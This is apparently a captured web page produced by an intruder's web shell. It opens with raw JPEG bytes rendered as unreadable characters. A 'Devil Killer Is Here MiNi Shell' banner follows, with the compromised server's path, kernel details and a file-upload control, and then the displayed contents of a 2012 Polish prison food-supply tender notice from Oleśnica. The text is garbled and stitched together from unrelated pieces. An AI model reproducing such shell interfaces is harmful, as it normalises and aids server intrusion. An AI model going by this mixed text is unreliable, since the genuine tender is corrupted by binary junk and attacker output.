JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120614/203018-N-2012.html

<p class="kh_header"><b>Oleśnica: Postępowanie o udzielenie zamówienia w trybie przetargu nieograniczonego o wartości poniżej 130 000 euro, na dostawę dla potrzeb Zakładu Karnego w Oleśnicy artykułów spożywczych różnych Nr sprawy: D/Kw -220_04_2012.</b><br>
<b>Numer ogłoszenia: 203018 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Oleśnicy , ul. Wały Jagiellońskie 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 0-71 3980700, 3980705, faks 0-71 3980712.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Służba Więzienna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia w trybie przetargu nieograniczonego o wartości poniżej 130 000 euro, na dostawę dla potrzeb Zakładu Karnego w Oleśnicy artykułów spożywczych różnych Nr sprawy: D/Kw -220_04_2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa artykułów spożywczych różnych.
2.Wspólny Słownik Zamówień (grupa CPV); 031,151,152,153,154,155,156,158.
3. Zamawiający dopuszcza składanie ofert częściowych na części:

I część- Nabiał (CPV 15500000-3),ilość szacunkowa na rok:
1.Mleko w proszku odtłuszczone (opakowanie  0,5 - 25 kg.)CPV 15511700-0,ilość- 125 kg.
2.Ser twaróg półtłusty - kostki, zaw. tłuszczu 4,00 - 4,5 %,(opakowanie  0,20 - 1 kg),
CPV 15542100-0,ilość- 1100 kg.
3.Ser topiony  ,z zawartością tłuszczu minimum 40%,(opakowanie kostka 100 g,CPV 15543000-6), ilość 250 kg,
4. Śmietana ,Świeża z zawartością tłuszczu 12%,(opakowanie  200 - 400 ml)
CPV 15512000-0, w ilości 1100 litrów.
5.Kefir ,Zawartość tłuszczu do 1,5%,(opakowanie do 200 ml,CPV 15551000-5)
w ilości 140 litr,
6.Serek  śmietankowy, naturalny (opakowanie kubek 100g,CPV 15551000-5),w ilości 30 kg,
7.Serek homogenizowany naturalny (opakowanie kubek 150g,CPV 15551000-5),w ilości 30 kg.
                                                                             
II część- tłuszcze (CPV 15400000-2),ilość szacunkowa na rok:
1.Margaryna do smarowania  pieczywa ,zaw. tłuszczu min 20% (opakowanie kubek do 0,5  kg,CPV 15431100-9), w ilości 1500 kg.
2.Margaryna do smarowania pieczywa zaw. tłuszczu 50-60 % (opakowanie kostka 200-250 g,CPV 15431100-9),w ilości 140 kg,
3.Olej roślinny jadalny (do smażenia i surówek) opakowanie butelki 0,9 - 3 l,CPV 
15411200-4) w ilości 900 litr.

III część- zupy,sosy,przyprawy,produkty sojowe ( CPV 15800000-6)ilość szacunkowa na rok:
1Bulion drobiowy w proszku- opak. do 10 kg ,ilość szacunkowa na rok 180 kg,
2.Zupa barszcz biały w proszku- opak-  do 10 kg,ilość 50 kg,
3.Zupa pieczarkowa w proszku- opak-  do 10 kg,ilość 60 kg,
4.Zupa grzybowa w proszku- opak-  do 10 kg,ilość 60 kg,
5.Sos węgierski w proszku- opak-  do 10 kg,ilość 40 kg,
6.Sos do spaghetti po bolońsku  opak-  do 10 kg,ilość 40 kg,
7.Sos grzybowy- opak-  do 10 kg,ilość 30 kg,
8.Sos pomidorowy- opak-  do 10 kg,ilość 30 kg,
9.Sos pieczeniowy  opak-  do 10 kg,ilość 30 kg,
10.Fix do gulaszu  opak-  do 10 kg,ilość 20 kg,
11.Herbata granulowana -opak. Do 5 kg,ilość 100 kg,
12.Kawa zbożowa - opakowanie do 10 kg,ilość 25 kg,
13.Sól spożywcza drobnoziarnista  jodowana - opakowanie do 10 kg,ilość 300 kg,
14.Musztarda  - opakowanie do 1 kg,ilość 300 kg,
15.Ocet spirytusowy 10%  - butelki do 1 l,ilość 40 litr,
16.Majonez - opakowanie  do 1 kg,ilość 100 kg,
17.Kwasek cytrynowy opakowanie do 2 kg,ilość 7 kg,
18.Czosnek mielony - opakowanie do 2 kg,ilość 40 kg,
19.Majeranek - opakowanie do 1 kg,ilość 5 kg,
20.Liść laurowy - opakowanie do 1 kg,ilość 1 kg,
21.Papryka ostra mielona - opakowanie do 1 kg , ilość 8 kg,
22.Pieprz prawdziwy mielony - opakowanie do 1 kg,ilość 15 kg,
23.Pieprz ziołowy- opakowanie do 1 kg,ilość 2 kg,
24.Ziele angielskie - opakowanie do 0,5 kg,ilość 0,50 kg,
25.Przyprawa do zup w płynie - opakowanie  1 litr,ilość 300 litr,
26.Cynamon mielony- opakowanie do 200 g, ilość 1 kg,
27.Kotlety z soi a la schabowe o gramaturze min 16 gr /szt.,opakowanie do 15 kg, 
ilość 80 kg,
Dostawa w.w artykułów wg. potrzeb ,średnio raz w miesiącu lub raz na dwa miesiące.Termin przydatności do spożycia od dnia dostawy:min.3 miesiące

IV część -artykuły zbożowe,skrobiowe i przemiału ziarna(CPV 15600000-4),Ilość szacunkowa na rok:
1Kasza jęczmienna  opak. 1-1,5 kg,ilość 700 kg,
2.Kasza manna opak. 1-1,5 kg,ilość 80 kg,
3.Mąka pszenna typ 500 opak. 1- 1,5 kg,ilość 1500 kg ,
4.Mąka ziemniaczana - opak  1-1,5 kg,ilość 100 kg, 
5.Ryż biały łuskany opak  1- 25 kg ,ilość 800 kg. 
Dostawa w.w artykułów raz na dwa miesiące. Termin przydatności do spożycia od dnia dostawy:min.3 miesiące.
                                                      
V część- warzywa przetworzone ,strączkowe (CPV 15300000-1),Ilość szacunkowa na rok:
1.Dżem truskawkowy, opak od 1- 13 kg,ilość 500 kg,
2.Marmolada wieloowocowa twarda opak od 1-13 kg,ilość 650 kg,
3.Syrop owocowy zagęszczony opak do 3 litr,ilość 200 litr,
4.Koncentrat  pomidorowy 30% ,opak.  0,9 - 4,5 kg ,ilość 500 kg,
5.Kukurydza konserwowa ,waga produktu netto w opakowaniu od 200 do 500g w I gatunku ilość 180 kg,
6.Groszek konserwowy ,waga produktu netto w opakowaniu od 200 do 500g w I gatunku,ilość 400 kg,
7.Sałatka szwedzka,waga produktu netto opak od 1- 4,25 kg,ilość 600 kg,
8.Fasola Jaś opak. 1- 25 kg,ilość 400 kg,
9.Groch łuszczony połówki,opak. 1- 25 kg,ilość 200 kg,
10.Chrzan tarty ,waga netto produktu w opakowaniu od 100 do 400g w I gatunku
 ilość 30 kg
11.Szczaw konserwowy, waga netto produktu w opakowaniu szklanym  od 200g do 900g w I gatunku,ilość 60 kg,
12.Leczo pieczarkowe, waga produktu netto,opak.szklane do 4,25 kg,ilość 80 kg,
 
Dostawa w.w artykułów raz w miesiącu. Termin przydatności do spożycia od dnia 
dostawy:min.3 miesiące.   

VI część- konserwy mięsne,rybne (CPV 15100000-9,15200000-0),Ilość szacunkowa na rok:
1.Konserwa mięsna 300 g,
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład: minimum 40 % mięso wieprzowe, tłuszcz wieprzowy, skórki wieprzowe ,ilość 500 kg,
2.Pasztety drobiowe 300 g
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład; minimum 16 % mięso drobiowe, wątroba wieprzowa lub drobiowa minimum 10%, skórki drobiowe, tłuszcz wieprzowy. ilość 450 kg,
3.Pasztet drobiowy 100-130g opak alumin.
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład: minimum 20% mięso drobiowe, wątroba wieprzowa lub drobiowa minimum 10 %, tłuszcz wieprzowy. ilość 200 kg,
4.Konserwa rybna w pomidor. 300g do 330g,   
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana, ilość 400 kg,
5.Konserwa rybna w pomidor. 170 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 8 kg,
6.Paprykarz szczeciński 300 g do 330 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 600 kg,
7.Paprykarz szczeciński 130-140 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 10 kg,

Dostawa w.w artykułów raz na 2  miesiące. Termin przydatności do spożycia od dnia dostawy:min.12 miesięcy.
  
VII część- ryby (CPV 15200000-0),Ilość szacunkowa na rok:
1.Ryba mrożona tusza ( bez głowy mintaj,miruna,morszczuk),
zawartość glazury do 10% ,ilość 400 kg,
2.Filet śledziowy ala matjas (opakowanie od 2 kg-4 kg),ilość 250 kg,
3.Burgery rybne  panierowane ,
Burgery rybne mrożone panierowane .Burgery jednolite o wyrównanej wielkości, całe (1 szt. 55-100 [g] masy netto),ilość 200 kg,

VIII część- kiszonki ( CPV 15300000-1),Ilość szacunkowa na rok:
1.Kapusta kiszona (opakowanie beczka do 120 kg),ilość 1800 kg,
2.Ogórki kiszone (opakowanie beczka do 80 kg ),ilość 1500 kg, 

IX część -jaja(CPV 0314000-4),Ilość szacunkowa na rok:
1.Jaja kurze- klasa świeżości A,kategoria wagowa M (od 53 do 63 g),
jaja w wytłaczankach , pakowane w skrzynkach,kartonach po 360 szt, ilość 37000 szt,
X część -cukier( CPV 15800000-6),Ilość szacunkowa na rok:
1.Cukier biały kryształ (opakowanie 1 kg lub luz),ilość 1000 kg,

XI część -makaron ( CPV 15851100-9) Ilość szacunkowa na rok,
1.Makaron bezjajeczny gruby: świderki, kolanka,rurka ,łazanki,ilość 1200 kg,
2.Makaron bezjajeczny cienki: nitki ,cienka wstążka,ilość 250 kg.

4)Wykonawca może złożyć ofertę na wybrane przez siebie części zamówienia, o ile oferta obejmuje wszystkie produkty w danej części.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.00.00-4, 15.50.00.00-3, 15.40.00.00-2, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 15.20.00.00-9, 15.20.00.00-0, 15.85.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z art. 22 ust. 1 Pzp, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 2) posiadania wiedzy i doświadczenia; 3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 4) sytuacji ekonomicznej i finansowej. 2. Z udziału w niniejszym postępowaniu wklucza się wykonawców,którzy podlegają wykluczeniu na podstawie art.24 ust.1 ustawy Pzp. 3. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wymienionych w punkcie 6 siwz ,według formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wymienionych w punkcie 6 siwz ,według formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wymienionych w punkcie 6 siwz ,według formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wymienionych w punkcie 6 siwz ,według formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wymienionych w punkcie 6 siwz ,według formuły spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aby oferta składana przez wykonawców była ważna pod względem formalnym powinna zawierać: 1.Prawidłowo wypełniony i podpisany formularz cenowy -załącznik nr 1, 2.W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp (warunków określonych w niniejszej siwz w rozdziale 5 pkt 1), wykonawca składa do oferty następujące dokumenty: a) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 ) 3.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, wykonawca składa do oferty następujące dokumenty: a) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 2 ), b)aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp (załącznik nr 3 ), c)Jeżeli wykonawca jest rolnikiem indywidualnym (definicja rolnika indywidualnego znajduje się w ustawie z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego, art. 6 (Dz. U. z 2003 r. Nr 64,poz. 592), który nie prowadzi pozarolniczej działalności gospodarczej, na podstawie przepisów o działalności gospodarczej lub innych przepisów szczegółowych (czyli zarejestrowanej np. w ewidencji działalności gospodarczej), to w miejsce dokumentu wymienionego w pkt b) przedkłada aktualne oświadczenie, o którym mowa w art. 7 ust. 1 ustawy z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego- Dowodem potwierdzającym osobiste prowadzenie gospodarstwa rolnego jest oświadczenie prowadzącego to gospodarstwo, poświadczone przez wójta (burmistrza, prezydenta miasta) lub przez osobę upoważnioną. W/w oświadczenie ma być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz mają się w nim znajdować dane dotyczące osoby prowadzącej gospodarstwo rolne, tj.: a) imię i nazwisko, b) dokładny adres zamieszkania c) powierzchnia gospodarstwa 4.Zatwierdzony przez wykonawcę wzór umowy- załącznik nr 4. Wykonawca składa wszystkie dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny ,ul. Wały Jagiellońskie 1,56-400 Oleśnica..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 10:00, miejsce: Zakład Karny ,ul. Wały Jagiellońskie 1,56-400 Oleśnica (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Mleko w proszku odtłuszczone (opakowanie  0,5 - 25 kg.)CPV 15511700-0,ilość- 125 kg.
2.Ser twaróg półtłusty - kostki, zaw. tłuszczu 4,00 - 4,5 %,(opakowanie  0,20 - 1 kg),
CPV 15542100-0,ilość- 1100 kg.
3.Ser topiony  ,z zawartością tłuszczu minimum 40%,(opakowanie kostka 100 g,CPV 15543000-6), ilość 250 kg,
4. Śmietana ,Świeża z zawartością tłuszczu 12%,(opakowanie  200 - 400 ml)
CPV 15512000-0, w ilości 1100 litrów.
5.Kefir ,Zawartość tłuszczu do 1,5%,(opakowanie do 200 ml,CPV 15551000-5)
w ilości 140 litr,
6.Serek  śmietankowy, naturalny (opakowanie kubek 100g,CPV 15551000-5),w ilości 30 kg,
7.Serek homogenizowany naturalny (opakowanie kubek 150g,CPV 15551000-5),w ilości 30 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.17.00-0, 15.54.21.00-0, 15.54.20.00-6, 15.51.20.00-0, 15.55.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Margaryna do smarowania  pieczywa ,zaw. tłuszczu min 20% (opakowanie kubek do 0,5  kg,CPV 15431100-9), w ilości 1500 kg.
2.Margaryna do smarowania pieczywa zaw. tłuszczu 50-60 % (opakowanie kostka 200-250 g,
CPV 15431100-9),w ilości 140 kg,
3.Olej roślinny jadalny (do smażenia i surówek) opakowanie butelki 0,9 - 3 l,CPV 15411200-4) w ilości 900 litr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.43.11.00-9, 15.43.11.00-9, 15.41.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zupy,sosy,przyprawy,produkty sojowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bulion drobiowy w proszku- opak. do 10 kg ,ilość szacunkowa na rok 180 kg,
2.Zupa barszcz biały w proszku- opak-  do 10 kg,ilość 50 kg,
3.Zupa pieczarkowa w proszku- opak-  do 10 kg,ilość 60 kg,
4.Zupa grzybowa w proszku- opak-  do 10 kg,ilość 60 kg,
5.Sos węgierski w proszku- opak-  do 10 kg,ilość 40 kg,
6.Sos do spaghetti po bolońsku  opak-  do 10 kg,ilość 40 kg,
7.Sos grzybowy- opak-  do 10 kg,ilość 30 kg,
8.Sos pomidorowy- opak-  do 10 kg,ilość 30 kg,
9.Sos pieczeniowy  opak-  do 10 kg,ilość 30 kg,
10.Fix do gulaszu  opak-  do 10 kg,ilość 20 kg,
